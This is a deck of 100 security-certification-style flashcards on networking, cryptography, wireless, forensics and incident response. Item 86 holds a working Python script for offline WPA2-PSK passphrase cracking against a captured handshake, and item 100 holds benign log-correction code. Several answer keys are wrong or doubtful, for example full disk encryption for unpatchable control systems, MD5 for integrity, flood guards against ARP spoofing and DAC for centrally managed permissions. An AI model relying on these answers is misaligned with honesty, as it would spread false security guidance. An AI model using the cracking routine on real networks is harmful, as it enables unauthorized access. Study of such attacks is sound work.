Deck A Flashcards

1
Q

Which of the following should the security administrator implement to limit web traffic based on country of origin? (Select THREE).

A. Spam filter

B. Load balancer

C. Antivirus

D. Proxies

E. Firewall

F. NIDS

G. URL filtering

A

Proxies

Firewall

URL filtering

2
Q

Which of the following is a security advantage of using NoSQL vs. SQL databases in a three-tier environment?

A. NoSQL databases are not vulnerable to XSRF attacks from the application server.

B. NoSQL databases are not vulnerable to SQL injection attacks.

C. NoSQL databases encrypt sensitive information by default.

D. NoSQL databases perform faster than SQL databases on the same hardware.

A

NoSQL databases are not vulnerable to SQL injection attacks.

3
Q

A technician has implemented a system in which all workstations on the network will receive security updates on the same schedule. Which of the following concepts does this illustrate?

A. Patch management

B. Application hardening

C. White box testing

D. Black box testing

A

Patch management

4
Q

A system administrator has concerns regarding their users accessing systems and secured areas using others’ credentials. Which of the following can BEST address this concern?

A. Create conduct policies prohibiting sharing credentials.

B. Enforce a policy shortening the credential expiration timeframe.

C. Implement biometric readers on laptops and restricted areas.

D. Install security cameras in areas containing sensitive systems.

A

Implement biometric readers on laptops and restricted areas.

5
Q

Which of the following is the process in which a law enforcement officer or a government agent encourages or induces a person to commit a crime when the potential criminal expresses a desire not to go ahead?

A. Enticement

B. Entrapment

C. Deceit

D. Sting

A

Entrapment

6
Q

A user attempting to log on to a workstation for the first time is prompted for the following information before being granted access: username, password, and a four-digit security pin that was mailed to him during account registration. This is an example of which of the following?

A. Dual-factor authentication

B. Multifactor authentication

C. Single factor authentication

D. Biometric authentication

A

Single factor authentication

7
Q

Peter, the system administrator, has concerns regarding users losing their company-provided smartphones. Peter’s focus is on equipment recovery. Which of the following BEST addresses his concerns?

A. Enforce device passwords.

B. Use remote sanitation.

C. Enable GPS tracking.

D. Encrypt stored data.

A

Enable GPS tracking

8
Q

An incident response team member needs to perform a forensics examination but does not have the required hardware. Which of the following will allow the team member to perform the examination with minimal impact to the potential evidence?

A. Using a software file recovery disc

B. Mounting the drive in read-only mode

C. Imaging based on order of volatility

D. Hashing the image after capture

A

Mounting the drive in read-only mode

9
Q

A user has several random browser windows opening on their computer. Which of the following programs can be installed on his machine to help prevent this from happening?

A. Antivirus

B. Pop-up blocker

C. Spyware blocker

D. Anti-spam

A

Pop-up blocker

10
Q

Which of the following would be a reason for developers to utilize an AES cipher in CCM mode (Counter with Chain Block Message Authentication Code)?

A. It enables the ability to reverse the encryption with a separate key

B. It allows for one time pad inclusions with the passphrase

C. Counter mode alternates between synchronous and asynchronous encryption

D. It allows a block cipher to function as a stream cipher

A

It allows a block cipher to function as a stream cipher

11
Q

A company is looking to improve their security posture by addressing risks uncovered by a recent penetration test. Which of the following risks is MOST likely to affect the business on a day-to-day basis?

A. Insufficient encryption methods

B. Large scale natural disasters

C. Corporate espionage

D. Lack of antivirus software

A

Lack of antivirus software

12
Q

Which of the following disaster recovery strategies has the highest cost and shortest recovery time?

A. Warm site

B. Hot site

C. Cold site

D. Co-location site

A

Hot site

13
Q

Jane, the security administrator, sets up a new AP but realizes too many outsiders are able to connect to that AP and gain unauthorized access. Which of the following would be the BEST way to mitigate this issue and still provide coverage where needed? (Select TWO).

A. Disable the wired ports

B. Use channels 1, 4 and 7 only

C. Enable MAC filtering

D. Disable SSID broadcast

E. Switch from 802.11a to 802.11b

A

Enable MAC filtering

Disable SSID broadcast

14
Q

Peter, the systems administrator, is setting up a wireless network for his team’s laptops only and needs to prevent other employees from accessing it. Which of the following would BEST address this?

A. Disable default SSID broadcasting.

B. Use WPA instead of WEP encryption.

C. Lower the access point’s power settings.

D. Implement MAC filtering on the access point.

A

Implement MAC filtering on the access point.

15
Q

An organization needs a security control that identifies when an organizational system has been unplugged and a rogue system has been plugged in. The security control must also provide the ability to supply automated notifications. Which of the following would allow the organization to BEST meet this business requirement?

A. MAC filtering

B. ACL

C. SNMP

D. Port security

A

Port security

16
Q

At an organization, unauthorized users have been accessing network resources via unused network wall jacks. Which of the following would be used to stop unauthorized access?

A. Configure an access list.

B. Configure spanning tree protocol.

C. Configure port security.

D. Configure loop protection.

A

Configure port security

17
Q

Which of the following is a best practice when a mistake is made during a forensics examination?

A. The examiner should verify the tools before, during, and after an examination.

B. The examiner should attempt to hide the mistake during cross-examination.

C. The examiner should document the mistake and work around the problem.

D. The examiner should disclose the mistake and assess another area of the disc.

A

The examiner should document the mistake and work around the problem.

18
Q

After recovering from a data breach in which customer data was lost, the legal team meets with the Chief Security Officer (CSO) to discuss ways to better protect the privacy of customer data.
Which of the following controls support this goal?

A. Contingency planning

B. Encryption and stronger access control

C. Hashing and non-repudiation

D. Redundancy and fault tolerance

A

Encryption and stronger access control

19
Q

Which of the following is true about asymmetric encryption?

A. A message encrypted with the private key can be decrypted by the same key

B. A message encrypted with the public key can be decrypted with a shared key.

C. A message encrypted with a shared key, can be decrypted by the same key.

D. A message encrypted with the public key can be decrypted with the private key.

A

A message encrypted with the public key can be decrypted with the private key.

20
Q

Establishing a method to erase or clear cluster tips is an example of securing which of the following?

A. Data in transit

B. Data at rest

C. Data in use

D. Data in motion

A

Data at rest

21
Q

Which of the following security awareness training is BEST suited for data owners who are concerned with protecting the confidentiality of their data?

A. Social networking use training

B. Personally owned device policy training

C. Tailgating awareness policy training

D. Information classification training

A

Information classification training

22
Q

Which of the following types of cryptography should be used when minimal overhead is necessary for a mobile device?

A. Block cipher

B. Elliptical curve cryptography

C. Diffie-Hellman algorithm

D. Stream cipher

A

Elliptical curve cryptography

23
Q

Which of the following is the MOST likely cause of users being unable to verify a single user’s email signature and that user being unable to decrypt sent messages?

A. Unmatched key pairs

B. Corrupt key escrow

C. Weak public key

D. Weak private key

A

Unmatched key pairs

24
Q

A security administrator wishes to increase the security of the wireless network. Which of the following BEST addresses this concern?

A. Change the encryption from TKIP-based to CCMP-based.

B. Set all nearby access points to operate on the same channel.

C. Configure the access point to use WEP instead of WPA2.

D. Enable all access points to broadcast their SSIDs.

A

Change the encryption from TKIP-based to CCMP-based.

25
Q

Which of the following ports is used to securely transfer files between remote UNIX systems?

A. 21

B. 22

C. 69

D. 445

A

22

26
Q

A company needs to receive data that contains personally identifiable information. The company requires both the transmission and data at rest to be encrypted. Which of the following achieves this goal? (Select TWO).

A. SSH

B. TFTP

C. NTLM

D. TKIP

E. SMTP

F. PGP/GPG

A

SSH

PGP/GPG

27
Q

Which of the following is MOST critical in protecting control systems that cannot be regularly patched?

A. Asset inventory

B. Full disk encryption

C. Vulnerability scanning

D. Network segmentation

A

Full disk encryption

28
Q

Datacenter access is controlled with proximity badges that record all entries and exits from the datacenter. The access records are used to identify which staff members accessed the data center in the event of equipment theft. Which of the following MUST be prevented in order for this policy to be effective?

A. Password reuse

B. Phishing

C. Social engineering

D. Tailgating

A

Tailgating

29
Q

The use of social networking sites introduces the risk of:

A. Disclosure of proprietary information

B. Data classification issues

C. Data availability issues

D. Broken chain of custody

A

Disclosure of proprietary information

30
Q

Which of the following concepts allows an organization to group large numbers of servers together in order to deliver a common service?

A. Clustering

B. RAID

C. Backup Redundancy

D. Cold site

A

Clustering

31
Q

Which of the following wireless security technologies continuously supplies new keys for WEP?

A. TKIP

B. Mac filtering

C. WPA2

D. WPA

A

TKIP

32
Q

To help prevent unauthorized access to PCs, a security administrator implements screen savers that lock the PC after five minutes of inactivity. Which of the following controls is being described in this situation?

A. Management

B. Administrative

C. Technical

D. Operational

A

Technical

33
Q

When a communications plan is developed for disaster recovery and business continuity plans, the MOST relevant items to include would be: (Select TWO).

A. Methods and templates to respond to press requests, institutional and regulatory reporting requirements.

B. Methods to exchange essential information to and from all response team members, employees, suppliers, and customers.

C. Developed recovery strategies, test plans, post-test evaluation and update processes.

D. Defined scenarios by type and scope of impact and dependencies, with quantification of loss potential.

E. Methods to review and report on system logs, incident response, and incident handling.

A

Methods and templates to respond to press requests, institutional and regulatory reporting requirements.

Methods to exchange essential information to and from all response team members, employees, suppliers, and customers.

34
Q

On a train, an individual is watching a proprietary video on Peter’s laptop without his knowledge. Which of the following does this describe?

A. Tailgating

B. Shoulder surfing

C. Interference

D. Illegal downloading

A

Shoulder surfing

35
Q

A company’s business model was changed to provide more web presence and now its ERM software is no longer able to support the security needs of the company. The current data center will continue to provide network and security services. Which of the following network elements would be used to support the new business model?

A. Software as a Service

B. DMZ

C. Remote access support

D. Infrastructure as a Service

A

Software as a Service

36
Q

Which of the following network design elements allows for many internal devices to share one public IP address?

A. DNAT

B. PAT

C. DNS

D. DMZ

A

PAT

37
Q

A malicious individual is attempting to write too much data to an application’s memory. Which of the following describes this type of attack?

A. Zero-day

B. SQL injection

C. Buffer overflow

D. XSRF

A

Buffer overflow

38
Q

After visiting a website, a user receives an email thanking them for a purchase which they did not request. Upon investigation the security administrator sees the following source code in a pop-up window: “Perform Purchase”

Which of the following has MOST likely occurred?

A. SQL injection

B. Cookie stealing

C. XSRF

D. XSS

A

XSRF

39
Q

Matt, an IT administrator, wants to protect a newly built server from zero day attacks. Which of the following would provide the BEST level of protection?

A. HIPS

B. Antivirus

C. NIDS

D. ACL

A

HIPS

40
Q

The system administrator is reviewing the following logs from the company web server:

12: 34:56 GET /directory_listing.php?user=admin&pass=admin1
12: 34:57 GET /directory_listing.php?user=admin&pass=admin2
12: 34:58 GET /directory_listing.php?user=admin&pass=1admin
12: 34:59 GET /directory_listing.php?user=admin&pass=2admin

Which of the following is this an example of?

A. Online rainbow table attack

B. Offline brute force attack

C. Offline dictionary attack

D. Online hybrid attack

A

Online hybrid attack

41
Q

A new MPLS network link has been established between a company and its business partner.
The link provides logical isolation in order to prevent access from other business partners. Which of the following should be applied in order to achieve confidentiality and integrity of all data across the link?

A. MPLS should be run in IPVPN mode.

B. SSL/TLS for all application flows.

C. IPSec VPN tunnels on top of the MPLS link.

D. HTTPS and SSH for all application flows.

A

IPSec VPN tunnels on top of the MPLS link.

42
Q

The security manager must store a copy of a sensitive document and needs to verify at a later point that the document has not been altered. Which of the following will accomplish the security manager’s objective?

A. RSA

B. AES

C. MD5

D. SHA

A

MD5

43
Q

A corporation is looking to expand their data center but has run out of physical space in which to store hardware. Which of the following would offer the ability to expand while keeping their current data center operated by internal staff?

A. Virtualization

B. Subnetting

C. IaaS

D. SaaS

A

Virtualization

44
Q

A system security analyst using an enterprise monitoring tool notices an unknown internal host exfiltrating files to several foreign IP addresses. Which of the following would be an appropriate mitigation technique?

A. Disabling unnecessary accounts

B. Rogue machine detection

C. Encrypting sensitive files

D. Implementing antivirus

A

Rogue machine detection

45
Q

Which of the following is BEST used to break a group of IP addresses into smaller network segments or blocks?

A. NAT

B. Virtualization

C. NAC

D. Subnetting

A

Subnetting

46
Q

One of the most consistently reported software security vulnerabilities that leads to major exploits is:

A. Lack of malware detection.

B. Attack surface decrease.

C. Inadequate network hardening.

D. Poor input validation.

A

Poor input validation.

47
Q

An auditor’s report discovered several accounts with no activity for over 60 days. The accounts were later identified as belonging to contractors who would be returning in three months and would need to resume their activities. Which of the following would mitigate and secure the auditor’s finding?

A. Disable unnecessary contractor accounts and inform the auditor of the update.

B. Reset contractor accounts and inform the auditor of the update.

C. Inform the auditor that the accounts belong to the contractors.

D. Delete contractor accounts and inform the auditor of the update.

A

Disable unnecessary contractor accounts and inform the auditor of the update.

48
Q

Emily, an application developer, implemented error and exception handling alongside input validation. Which of the following does this help prevent?

A. Buffer overflow

B. Pop-up blockers

C. Cross-site scripting

D. Fuzzing

A

Buffer overflow

49
Q

Several employees clicked on a link in a malicious message that bypassed the spam filter and their PCs were infected with malware as a result. Which of the following BEST prevents this situation from occurring in the future?

A. Data loss prevention

B. Enforcing complex passwords

C. Security awareness training

D. Digital signatures

A

Security awareness training

50
Q

Using a heuristic system to detect an anomaly in a computer’s baseline, a system administrator was able to detect an attack even though the company’s signature-based IDS and antivirus did not detect it. Further analysis revealed that the attacker had downloaded an executable file onto the company PC from the USB port and executed it to trigger a privilege escalation flaw.
Which of the following attacks has MOST likely occurred?

A. Cookie stealing

B. Zero-day

C. Directory traversal

D. XML injection

A

Zero-day

51
Q

A network administrator has recently updated their network devices to ensure redundancy is in place so that:

A. switches can redistribute routes across the network.

B. environmental monitoring can be performed.

C. single points of failure are removed.

D. hot and cold aisles are functioning.

A

single points of failure are removed.

52
Q

Customers’ credit card information was stolen from a popular video streaming company. A security consultant determined that the information was stolen, while in transit, from the gaming consoles of a particular vendor. Which of the following methods should the company consider to secure this data in the future?

A. Application firewalls

B. Manual updates

C. Firmware version control

D. Encrypted TCP wrappers

A

Encrypted TCP wrappers

53
Q

Peter, an employee, is terminated from the company and the legal department needs documents from his encrypted hard drive. Which of the following should be used to accomplish this task? (Select TWO).

A. Private hash

B. Recovery agent

C. Public key

D. Key escrow

E. CRL

A

Recovery agent

Key escrow

54
Q

Peter, the system administrator, has blocked users from accessing social media web sites. In addition to protecting company information from being accidentally leaked, which additional security benefit does this provide?

A. No competition with the company’s official social presence

B. Protection against malware introduced by banner ads

C. Increased user productivity based upon fewer distractions

D. Elimination of risks caused by unauthorized P2P file sharing

A

Protection against malware introduced by banner ads

55
Q

The security administrator is currently unaware of an incident that occurred a week ago. Which of the following will ensure the administrator is notified in a timely manner in the future?

A. User permissions reviews

B. Incident response team

C. Change management

D. Routine auditing

A

Routine auditing

56
Q

An administrator would like to review the effectiveness of existing security in the enterprise. Which of the following would be the BEST place to start?

A. Review past security incidents and their resolution

B. Rewrite the existing security policy

C. Implement an intrusion prevention system

D. Install honey pot systems

A

Implement an intrusion prevention system

57
Q

A system administrator wants to enable WPA2 CCMP. Which of the following is the only encryption used?

A. RC4

B. DES

C. 3DES

D. AES

A

AES

58
Q

A security administrator has just finished creating a hot site for the company. This implementation relates to which of the following concepts?

A. Confidentiality

B. Availability

C. Succession planning

D. Integrity

A

Availability

59
Q

Emily, a company’s security officer, often receives reports of unauthorized personnel having access codes to the cipher locks of secure areas in the building. Emily should immediately implement which of the following?

A. Acceptable Use Policy

B. Physical security controls

C. Technical controls

D. Security awareness training

A

Security awareness training

60
Q

A new virtual server was created for the marketing department. The server was installed on an existing host machine. Users in the marketing department report that they are unable to connect to the server. Technicians verify that the server has an IP address in the same VLAN as the marketing department users. Which of the following is the MOST likely reason the users are unable to connect to the server?

A. The new virtual server’s MAC address was not added to the ACL on the switch

B. The new virtual server’s MAC address triggered a port security violation on the switch

C. The new virtual server’s MAC address triggered an implicit deny in the switch

D. The new virtual server’s MAC address was not added to the firewall rules on the switch

A

The new virtual server’s MAC address was not added to the ACL on the switch

61
Q

Matt, a security consultant, has been tasked with increasing server fault tolerance and has been given no budget to accomplish his task. Which of the following can Matt implement to ensure servers will withstand hardware failure?

A. Hardware load balancing

B. RAID

C. A cold site

D. A host standby

A

RAID

62
Q

Which of the following security account management techniques should a security analyst implement to prevent staff who have switched company roles from exceeding their privileges?

A. Internal account audits

B. Account disablement

C. Time of day restriction

D. Password complexity

A

Internal account audits

63
Q

Which of the following would the security engineer set as the subnet mask for the servers below to utilize host addresses on separate broadcast domains?
Server 1: 192.168.100.6
Server 2: 192.168.100.9
Server 3: 192.169.100.20

A. /24

B. /27

C. /28

D. /29

E. /30

A

/29

64
Q

Disabling unnecessary services, restricting administrative access, and enabling auditing controls on a server are forms of which of the following?

A. Application patch management

B. Cross-site scripting prevention

C. Creating a security baseline

D. System hardening

A

System hardening

65
Q

Which of the following is best practice to put at the end of an ACL?

A. Implicit deny

B. Time of day restrictions

C. Implicit allow

D. SNMP string

A

Implicit deny

66
Q

Some customers have reported receiving an untrusted certificate warning when visiting the company’s website. The administrator ensures that the certificate is not expired and that customers have trusted the original issuer of the certificate. Which of the following could be causing the problem?

A. The intermediate CA certificates were not installed on the server.

B. The certificate is not the correct type for a virtual server.

C. The encryption key used in the certificate is too short.

D. The client’s browser is trying to negotiate SSL instead of TLS

A

The intermediate CA certificates were not installed on the server.

67
Q

An administrator configures all wireless access points to make use of a new network certificate authority. Which of the following is being used?

A. WEP

B. LEAP

C. EAP-TLS

D. TKIP

A

EAP-TLS

68
Q

Which of the following application attacks is used against a corporate directory service where there are unknown servers on the network?

A. Rogue access point

B. Zero day attack

C. Packet sniffing

D. LDAP injection

A

LDAP injection

69
Q

A large multinational corporation with networks in 30 countries wants to establish an understanding of their overall public-facing network attack surface. Which of the following security techniques would be BEST suited for this?

A. External penetration test

B. Internal vulnerability scan

C. External vulnerability scan

D. Internal penetration test

A

External vulnerability scan

70
Q

While opening an email attachment, Peter, a customer, receives an error that the application has encountered an unexpected issue and must be shut down. This could be an example of which of the following attacks?

A. Cross-site scripting

B. Buffer overflow

C. Header manipulation

D. Directory traversal

A

Buffer overflow

71
Q

Jane, a VPN administrator, was asked to implement an encryption cipher with a MINIMUM effective security of 128 bits. Which of the following should Jane select for the tunnel encryption?

A. Blowfish

B. DES

C. SHA256

D. HMAC

A

Blowfish

72
Q

It is MOST important to make sure that the firewall is configured to do which of the following?

A. Alert management of a possible intrusion.

B. Deny all traffic and only permit by exception.

C. Deny all traffic based on known signatures.

D. Alert the administrator of a possible intrusion.

A

Deny all traffic and only permit by exception.

73
Q

A security administrator is notified that users attached to a particular switch are having intermittent connectivity issues. Upon further research, the administrator finds evidence of an ARP spoofing attack. Which of the following could be utilized to provide protection from this type of attack?

A. Configure MAC filtering on the switch.

B. Configure loop protection on the switch.

C. Configure flood guards on the switch.

D. Configure 802.1x authentication on the switch.

A

Configure flood guards on the switch.

74
Q

The IT department has set up a SharePoint site to be used on the intranet. Security has established the groups and permissions on the site. No one may modify the permissions, and all requests for access are centrally managed by the security team. This is an example of which of the following control types?

A. Rule based access control

B. Mandatory access control

C. User assigned privilege

D. Discretionary access control

A

Discretionary access control

75
Q

Which of the following is required to allow multiple servers to exist on one physical server?

A. Software as a Service (SaaS)

B. Platform as a Service (PaaS)

C. Virtualization

D. Infrastructure as a Service (IaaS)

A

Virtualization

76
Q

An organization is required to log all user internet activity. Which of the following would accomplish this requirement?

A. Configure an access list on the default gateway router. Configure the default gateway router to log all web traffic to a syslog server

B. Configure a firewall on the internal network. On the client IP address configuration, use the IP address of the firewall as the default gateway, configure the firewall to log all traffic to a syslog server

C. Configure a proxy server on the internal network and configure the proxy server to log all web traffic to a syslog server

D. Configure an access list on the core switch, configure the core switch to log all web traffic to a syslog server

A

Configure a proxy server on the internal network and configure the proxy server to log all web traffic to a syslog server

77
Q

When employees that use certificates leave the company they should be added to which of the following?

A. PKI

B. CA

C. CRL

D. TKIP

A

CRL

78
Q

A company would like to take electronic orders from a partner; however, they are concerned that a non-authorized person may send an order. The legal department asks if there is a solution that provides non-repudiation. Which of the following would meet the requirements of this scenario?

A. Encryption

B. Digital signatures

C. Steganography

D. Hashing

E. Perfect forward secrecy

A

Digital signatures

79
Q

An overseas branch office within a company has many more technical and non-technical security incidents than other parts of the company. Which of the following management controls should be introduced to the branch office to improve their state of security?

A. Initial baseline configuration snapshots

B. Firewall, IPS and network segmentation

C. Event log analysis and incident response

D. Continuous security monitoring processes

A

Continuous security monitoring processes

80
Q

A network administrator identifies sensitive files being transferred from a workstation in the LAN to an unauthorized outside IP address in a foreign country. An investigation determines that the firewall has not been altered, and antivirus is up-to-date on the workstation. Which of the following is the MOST likely reason for the incident?

A. MAC Spoofing

B. Session Hijacking

C. Impersonation

D. Zero-day

A

Zero-day

81
Q

A security technician is working with the network firewall team to implement access controls at the company’s demarc as part of the initiation of configuration management processes. One of the network technicians asks the security technician to explain the access control type found in a firewall. With which of the following should the security technician respond?

A. Rule based access control

B. Role based access control

C. Discretionary access control

D. Mandatory access control

A

Rule based access control

82
Q

During a security assessment, an administrator wishes to see which services are running on a remote server. Which of the following should the administrator use?

A. Port scanner

B. Network sniffer

C. Protocol analyzer

D. Process list

A

Port scanner

83
Q

A security administrator wants to perform routine tests on the network during working hours when certain applications are being accessed by the most people. Which of the following would allow the security administrator to test the lack of security controls for those applications with the least impact to the system?

A. Penetration test

B. Vulnerability scan

C. Load testing

D. Port scanner

A

Vulnerability scan

84
Q

Digital certificates can be used to ensure which of the following? (Select TWO).

A. Availability

B. Confidentiality

C. Verification

D. Authorization

E. Non-repudiation

A

Confidentiality

Non-repudiation

85
Q

The Chief Technical Officer (CTO) has tasked the Computer Emergency Response Team (CERT) to develop and update all Internal Operating Procedures and Standard Operating Procedures documentation in order to successfully respond to future incidents. Which of the following stages of the Incident Handling process is the team working on?

A. Lessons Learned

B. Eradication

C. Recovery

D. Preparation

A

Preparation

86
Q

A malicious user is sniffing a busy encrypted wireless network waiting for an authorized client to connect to it. Only after an authorized client has connected and the hacker was able to capture the client handshake with the AP can the hacker begin a brute force attack to discover the encryption key. Which of the following attacks is taking place?

A. IV attack

B. WEP cracking

C. WPA cracking

D. Rogue AP

A

WPA cracking
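What the captured handshake gives the attacker, as an added example (not part of the original deck): with the SSID, both MAC addresses, both nonces and the MIC from message 2 of the 4-way handshake, every passphrase guess can be checked offline by deriving PMK (PBKDF2-HMAC-SHA1, 4096 rounds), then PTK (the 802.11i PRF) and comparing the recomputed MIC. The handshake values below are constructed for the example, and the "captured" MIC is computed from the known passphrase so the flow runs offline; the key derivation follows IEEE 802.11i for WPA2-CCMP with EAPOL key descriptor version 2 (HMAC-SHA1-128 MIC).

```python
"""Offline WPA2-PSK brute force against a captured 4-way handshake (added example)."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 4096 rounds of PBKDF2-HMAC-SHA1 are the only work factor protecting a
    # weak PSK once the handshake has been captured.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) concatenated."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    """PTK for CCMP (384 bits); the first 16 bytes are the KCK used for the MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # Descriptor version 2: HMAC-SHA1 over the EAPOL-Key frame (MIC field
    # zeroed), truncated to 128 bits.
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack(handshake: dict, wordlist):
    """Return the passphrase whose derived KCK reproduces the captured MIC, else None."""
    for guess in wordlist:
        pmk = pmk_from_passphrase(guess, handshake["ssid"])
        ptk = derive_ptk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                         handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], handshake["eapol"]), handshake["mic"]):
            return guess
    return None


def build_sample_handshake(passphrase: str) -> dict:
    """Constructed stand-in for a sniffed handshake (not a real capture)."""
    hs = {
        "ssid": "CorpWiFi",
        "ap_mac": bytes.fromhex("001122334455"),
        "sta_mac": bytes.fromhex("66778899aabb"),
        "anonce": hashlib.sha256(b"constructed anonce").digest(),
        "snonce": hashlib.sha256(b"constructed snonce").digest(),
        # Placeholder EAPOL-Key message 2 bytes with the MIC field zeroed.
        "eapol": bytes.fromhex("0103007502010a00") + b"\x00" * 109,
    }
    kck = derive_ptk(pmk_from_passphrase(passphrase, hs["ssid"]), hs["ap_mac"],
                     hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
    hs["mic"] = eapol_mic(kck, hs["eapol"])  # what the sniffer would have recorded
    return hs


if __name__ == "__main__":
    captured = build_sample_handshake("correct horse")
    print(crack(captured, ["password", "letmein", "correct horse", "qwerty"]))
```

Nothing in the loop touches the network: once the handshake is on disk the only defences are a long random passphrase (or 802.1X/EAP, which has no shared PSK to guess).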

87
Q

Which of the following offers the LEAST secure encryption capabilities?

A. TwoFish

B. PAP

C. NTLM

D. CHAP

A

PAP

88
Q

Visitors entering a building are required to close the back door before the front door of the same entry room is opened. Which of the following is being described?

A. Tailgating

B. Fencing

C. Screening

D. Mantrap

A

Mantrap

89
Q

Which of the following is BEST used to capture and analyze network traffic between hosts on the same network segment?

A. Protocol analyzer

B. Router

C. Firewall

D. HIPS

A

Protocol analyzer

90
Q

Which of the following protocols is vulnerable to man-in-the-middle attacks by NOT using end-to-end TLS encryption?

A. HTTPS

B. WEP

C. WPA

D. WPA2

A

WEP

91
Q

Mike, a network administrator, has been asked to passively monitor network traffic to the company’s sales websites. Which of the following would be BEST suited for this task?

A. HIDS

B. Firewall

C. NIPS

D. Spam filter

A

NIPS (the closest of the listed options; a NIDS is the strictly passive sensor, but it is not offered here, and a NIPS deployed in-line will block as well as monitor)

92
Q

Users report that they are unable to access network printing services. The security technician checks the router access list and sees that web, email, and secure shell are allowed. Which of the following is blocking network printing?

A. Port security

B. Flood guards

C. Loop protection

D. Implicit deny

A

Implicit deny

93
Q

The concept of rendering data passing between two points over an IP based network impervious to all but the most sophisticated advanced persistent threats is BEST categorized as which of the following?

A. Stream ciphers

B. Transport encryption

C. Key escrow

D. Block ciphers

A

Transport encryption

94
Q

A CRL is made up of:

A. Malicious IP addresses.

B. Trusted CAs.

C. Untrusted private keys.

D. Public keys.

A

Public keys (strictly, a CRL lists the serial numbers of certificates the CA has revoked before expiry, so it identifies the public keys that must no longer be trusted)

95
Q

Used in conjunction, which of the following are PII? (Select TWO).

A. Marital status

B. Favorite movie

C. Pet’s name

D. Birthday

E. Full name

A

Birthday

Full name

96
Q

A security administrator must implement a network that is immune to ARP spoofing attacks. Which of the following should be implemented to ensure that a malicious insider will not be able to successfully use ARP spoofing techniques?

A. UDP

B. IPv6

C. IPSec

D. VPN

A

IPv6 (it has no ARP; neighbor discovery replaces it, though NDP can be spoofed in turn unless protections such as RA Guard are applied)

97
Q

Which of the following is a programming interface that allows a remote computer to run programs on a local machine?

A. RPC

B. RSH

C. SSH

D. SSL

A

RPC

98
Q

Which of the following would Peter, a security administrator, do to limit a wireless signal from penetrating the exterior walls?

A. Implement TKIP encryption

B. Consider antenna placement

C. Disable the SSID broadcast

D. Disable WPA

A

Consider antenna placement

99
Q

The Chief Information Officer (CIO) wants to implement a redundant server location to which the production server images can be moved within 48 hours and services can be quickly restored, in case of a catastrophic failure of the primary datacenter’s HVAC. Which of the following can be implemented?

A. Cold site

B. Load balancing

C. Warm site

D. Hot site

A

Warm site

100
Q

A recent intrusion has resulted in the need to perform incident response procedures. The incident response team has identified audit logs throughout the network and organizational systems which hold details of the security breach. Prior to this incident, a security consultant informed the company that they needed to implement an NTP server on the network. Which of the following is a problem that the incident response team will likely encounter during their assessment?

A. Chain of custody

B. Tracking man hours

C. Record time offset

D. Capture video traffic

A

Record time offset
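How the offset problem is handled in practice, as an added example (not part of the original deck): when hosts were not synchronised to NTP, each host's clock offset relative to a reference clock is measured at collection time, recorded with the evidence, and applied before logs are merged into a timeline. The log lines and offsets below are constructed; the point shown is that ordering the raw timestamps puts the database dump before the login that caused it, while the corrected timeline restores the real sequence.

```python
"""Correcting per-host clock skew before building an incident timeline (added example)."""
from datetime import datetime, timedelta

# Constructed log lines: "<host-local timestamp> <host> <message>".
RAW_LOGS = [
    "2024-03-01T10:05:12 web01 sshd: Accepted password for svc from 203.0.113.7",
    "2024-03-01T10:02:40 db01 mysql: table customers exported to /tmp/x.csv",
    "2024-03-01T10:09:55 fw01 deny tcp 10.0.0.5 -> 198.51.100.9:443 bytes=48M",
]

# Measured offset of each host clock against the reference clock, in seconds
# (positive = host clock runs ahead). Constructed values for the example.
MEASURED_OFFSETS = {"web01": 0, "db01": -300, "fw01": +60}


def parse_line(line: str):
    """Split a log line into (timestamp, host, message)."""
    ts, host, msg = line.split(maxsplit=2)
    return datetime.fromisoformat(ts), host, msg


def normalize(lines, offsets):
    """Shift every record onto the reference clock.

    A host without a measured offset is an error rather than assumed to be
    correct: an unmeasured clock is exactly what makes the evidence unreliable."""
    records = [parse_line(l) for l in lines]
    missing = sorted({host for _, host, _ in records} - set(offsets))
    if missing:
        raise ValueError(f"no measured clock offset for: {', '.join(missing)}")
    return [(ts - timedelta(seconds=offsets[host]), host, msg) for ts, host, msg in records]


def timeline(lines, offsets):
    """Return records ordered on the reference clock as (iso_ts, host, message)."""
    ordered = sorted(normalize(lines, offsets))
    return [(ts.isoformat(), host, msg) for ts, host, msg in ordered]


def host_order(lines, offsets):
    """Just the sequence of hosts, for checking what the timeline implies."""
    return [host for _, host, _ in timeline(lines, offsets)]


if __name__ == "__main__":
    uncorrected = {h: 0 for h in MEASURED_OFFSETS}
    print("raw order:      ", host_order(RAW_LOGS, uncorrected))
    print("corrected order:", host_order(RAW_LOGS, MEASURED_OFFSETS))
    for ts, host, msg in timeline(RAW_LOGS, MEASURED_OFFSETS):
        print(ts, host, msg)
```

The offsets themselves should be captured from each host alongside its logs (for example by querying the host's clock against the reference during acquisition) and preserved with the chain-of-custody record, since the corrected timeline is only as defensible as the measurement behind it.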